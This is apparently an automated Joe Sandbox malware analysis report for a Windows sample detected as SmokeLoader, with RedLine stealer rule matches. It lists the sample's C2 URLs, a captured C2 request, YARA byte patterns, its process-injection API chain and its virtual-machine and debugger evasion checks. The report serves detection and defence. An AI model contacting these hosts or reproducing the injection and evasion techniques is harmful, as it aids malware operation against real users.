Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:764039
MD5:0d810e582a95debff5e1a72a76c602c9
SHA1:486a963c02b9e7d5ecc2941c4dcb7f589954d7d7
SHA256:c57cafedd2e4617e24315cde0de7a6393610fb924e8bd4d3561ee3c4b2d90372
Tags:exe
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Contains functionality to inject code into remote processes
Deletes itself after installation
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • file.exe (PID: 5164 cmdline: C:\Users\user\Desktop\file.exe MD5: 0D810E582A95DEBFF5E1A72A76C602C9)
    • file.exe (PID: 6088 cmdline: C:\Users\user\Desktop\file.exe MD5: 0D810E582A95DEBFF5E1A72A76C602C9)
      • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • rudwagu (PID: 5400 cmdline: C:\Users\user\AppData\Roaming\rudwagu MD5: 0D810E582A95DEBFF5E1A72A76C602C9)
    • rudwagu (PID: 1324 cmdline: C:\Users\user\AppData\Roaming\rudwagu MD5: 0D810E582A95DEBFF5E1A72A76C602C9)
  • cleanup
{"C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}
SourceRuleDescriptionAuthorStrings
00000001.00000002.344568009.0000000000420000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000001.00000002.344568009.0000000000420000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x6f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    0000000B.00000002.408393791.00000000004E1000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      0000000B.00000002.408393791.00000000004E1000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x2f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      0000000B.00000002.408296472.00000000004A0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        Click to see the 7 entries
        SourceRuleDescriptionAuthorStrings
        1.2.file.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          11.2.rudwagu.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            11.0.rudwagu.400000.5.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              10.2.rudwagu.6e15a0.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                11.0.rudwagu.400000.6.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                  Click to see the 2 entries
                  No Sigma rule has matched
                  No Snort rule has matched

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: http://host-host-file8.com/URL Reputation: Label: malware
                  Source: file.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\rudwaguJoe Sandbox ML: detected
                  Source: 11.0.rudwagu.400000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                  Source: 11.0.rudwagu.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                  Source: 11.0.rudwagu.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                  Source: 11.0.rudwagu.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                  Source: 00000001.00000002.344568009.0000000000420000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}
                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: Binary string: C:\bicudo_cikiro\wuwud\cen26\rimitibifaru.pdb source: file.exe, rudwagu.2.dr
                  Source: Binary string: ZC:\bicudo_cikiro\wuwud\cen26\rimitibifaru.pdb source: file.exe, rudwagu.2.dr

                  Networking

                  barindex
                  Source: C:\Windows\explorer.exeDomain query: host-file-host6.com
                  Source: C:\Windows\explorer.exeDomain query: host-host-file8.com
                  Source: Malware configuration extractorURLs: http://host-file-host6.com/
                  Source: Malware configuration extractorURLs: http://host-host-file8.com/
                  Source: Joe Sandbox ViewASN Name: COMBAHTONcombahtonGmbHDE COMBAHTONcombahtonGmbHDE
                  Source: Joe Sandbox ViewIP Address: 84.21.172.159 84.21.172.159
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hhsselotxu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 321Host: host-file-host6.com
                  Source: explorer.exe, 00000002.00000000.299803671.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.329320639.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.259861471.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                  Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hhsselotxu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 321Host: host-file-host6.com
                  Source: unknownDNS traffic detected: queries for: host-file-host6.com

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: Yara matchFile source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.rudwagu.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.rudwagu.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.rudwagu.6e15a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.rudwagu.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.rudwagu.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.8e15a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.344568009.0000000000420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.408393791.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.408296472.00000000004A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000000.333482536.0000000004EC1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.344687233.0000000000521000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

                  System Summary

                  barindex
                  Source: 00000001.00000002.344568009.0000000000420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 0000000B.00000002.408393791.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 0000000B.00000002.408296472.00000000004A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 0000000A.00000002.397674421.0000000000722000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000002.00000000.333482536.0000000004EC1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000000.00000002.248700871.0000000000573000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000001.00000002.344687233.0000000000521000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 00000001.00000002.344568009.0000000000420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 0000000B.00000002.408393791.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 0000000B.00000002.408296472.00000000004A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 0000000A.00000002.397674421.0000000000722000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000002.00000000.333482536.0000000004EC1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000000.00000002.248700871.0000000000573000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000001.00000002.344687233.0000000000521000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004148D10_2_004148D1
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413C950_2_00413C95
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040CD0A0_2_0040CD0A
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004141D90_2_004141D9
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004156320_2_00415632
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004137510_2_00413751
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00407BA10_2_00407BA1
                  Source: C:\Users\user\Desktop\file.exeCode function: String function: 00408168 appears 45 times
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,0_2_008E0110
                  Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0040180C Sleep,NtTerminateProcess,1_2_0040180C
                  Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00401818 Sleep,NtTerminateProcess,1_2_00401818
                  Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00401822 Sleep,NtTerminateProcess,1_2_00401822
                  Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00401826 Sleep,NtTerminateProcess,1_2_00401826
                  Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00401834 Sleep,NtTerminateProcess,1_2_00401834
                  Source: C:\Users\user\AppData\Roaming\rudwaguCode function: 11_2_0040180C Sleep,NtTerminateProcess,11_2_0040180C
                  Source: C:\Users\user\AppData\Roaming\rudwaguCode function: 11_2_00401818 Sleep,NtTerminateProcess,11_2_00401818
                  Source: C:\Users\user\AppData\Roaming\rudwaguCode function: 11_2_00401822 Sleep,NtTerminateProcess,11_2_00401822
                  Source: C:\Users\user\AppData\Roaming\rudwaguCode function: 11_2_00401826 Sleep,NtTerminateProcess,11_2_00401826
                  Source: C:\Users\user\AppData\Roaming\rudwaguCode function: 11_2_00401834 Sleep,NtTerminateProcess,11_2_00401834
                  Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\rudwagu C:\Users\user\AppData\Roaming\rudwagu
                  Source: C:\Users\user\AppData\Roaming\rudwaguProcess created: C:\Users\user\AppData\Roaming\rudwagu C:\Users\user\AppData\Roaming\rudwagu
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\rudwaguProcess created: C:\Users\user\AppData\Roaming\rudwagu C:\Users\user\AppData\Roaming\rudwaguJump to behavior
                  Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\rudwaguJump to behavior
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@6/2@4/1
                  Source: C:\Users\user\AppData\Roaming\rudwaguCode function: 10_2_00729CB9 CreateToolhelp32Snapshot,Module32First,10_2_00729CB9
                  Source: C:\Users\user\Desktop\file.exeCommand line argument: _.K>0_2_004058A1
                  Source: C:\Users\user\Desktop\file.exeCommand line argument: Cgx0_2_004058A1
                  Source: C:\Users\user\Desktop\file.exeCommand line argument: tf710_2_004058A1
                  Source: C:\Users\user\Desktop\file.exeCommand line argument: yLmc0_2_004058A1
                  Source: C:\Users\user\Desktop\file.exeCommand line argument: /fY.0_2_004058A1
                  Source: C:\Users\user\Desktop\file.exeCommand line argument: NKR[0_2_004058A1
                  Source: C:\Users\user\Desktop\file.exeCommand line argument: mf:0_2_004058A1
                  Source: C:\Users\user\Desktop\file.exeCommand line argument: 5[$'0_2_004058A1
                  Source: C:\Users\user\Desktop\file.exeCommand line argument: ]q0r0_2_004058A1
                  Source: C:\Users\user\Desktop\file.exeCommand line argument: EuY0_2_004058A1
                  Source: C:\Users\user\Desktop\file.exeCommand line argument: +F280_2_004058A1
                  Source: C:\Users\user\Desktop\file.exeCommand line argument: eVS0_2_004058A1
                  Source: C:\Users\user\Desktop\file.exeCommand line argument: pumitafoto0_2_004058A1
                  Source: C:\Users\user\Desktop\file.exeCommand line argument: msimg32.dll0_2_004058A1
                  Source: C:\Users\user\Desktop\file.exeCommand line argument: 0.txt0_2_004058A1
                  Source: C:\Users\user\Desktop\file.exeCommand line argument: kernel32.dll0_2_004058A1
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\bicudo_cikiro\wuwud\cen26\rimitibifaru.pdb source: file.exe, rudwagu.2.dr
                  Source: Binary string: ZC:\bicudo_cikiro\wuwud\cen26\rimitibifaru.pdb source: file.exe, rudwagu.2.dr
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004081AD push ecx; ret 0_2_004081C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E198B push ebx; iretd 0_2_008E19B7
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E1977 push ebx; iretd 0_2_008E19B7
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E1970 push ebx; iretd 0_2_008E19B7
                  Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004011D0 push ebx; iretd 1_2_00401217
                  Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004011D7 push ebx; iretd 1_2_00401217
                  Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004011EB push ebx; iretd 1_2_00401217
                  Source: C:\Users\user\AppData\Roaming\rudwaguCode function: 10_2_0072FA58 pushad ; iretd 10_2_0072FA5E
                  Source: C:\Users\user\AppData\Roaming\rudwaguCode function: 10_2_0072ABCC push ebx; iretd 10_2_0072ABF7
                  Source: C:\Users\user\AppData\Roaming\rudwaguCode function: 10_2_0072ABB7 push ebx; iretd 10_2_0072ABF7
                  Source: C:\Users\user\AppData\Roaming\rudwaguCode function: 11_2_004011D0 push ebx; iretd 11_2_00401217
                  Source: C:\Users\user\AppData\Roaming\rudwaguCode function: 11_2_004011D7 push ebx; iretd 11_2_00401217
                  Source: C:\Users\user\AppData\Roaming\rudwaguCode function: 11_2_004011EB push ebx; iretd 11_2_00401217
                  Source: file.exeStatic PE information: section name: .lokeris
                  Source: file.exeStatic PE information: section name: .zoyan
                  Source: rudwagu.2.drStatic PE information: section name: .lokeris
                  Source: rudwagu.2.drStatic PE information: section name: .zoyan
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DAD4 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_0040DAD4
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\rudwaguJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\rudwaguJump to dropped file

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\file.exeJump to behavior
                  Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\rudwagu:Zone.Identifier read attributes | deleteJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: rudwagu, 0000000B.00000002.408364797.00000000004DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKC
                  Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\rudwaguKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\rudwaguKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\rudwaguKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\rudwaguKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\rudwaguKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\rudwaguKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Windows\explorer.exe TID: 4720Thread sleep count: 649 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 2216Thread sleep count: 338 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 2216Thread sleep time: -33800s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 4784Thread sleep count: 384 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 4784Thread sleep time: -38400s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 1272Thread sleep count: 527 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 1284Thread sleep count: 207 > 30Jump to behavior
                  Source: C:\Windows\explorer.exeLast function: Thread delayed
                  Source: C:\Windows\explorer.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-8853
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 649Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 384Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 527Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                  Source: explorer.exe, 00000002.00000000.288891686.000000000F5F1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 00000002.00000000.331858237.00000000045B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 00000002.00000000.317840368.00000000081DD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000^
                  Source: explorer.exe, 00000002.00000000.273864988.0000000006710000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
                  Source: explorer.exe, 00000002.00000000.288891686.000000000F5F1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ions-msP
                  Source: explorer.exe, 00000002.00000000.318294845.0000000008304000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
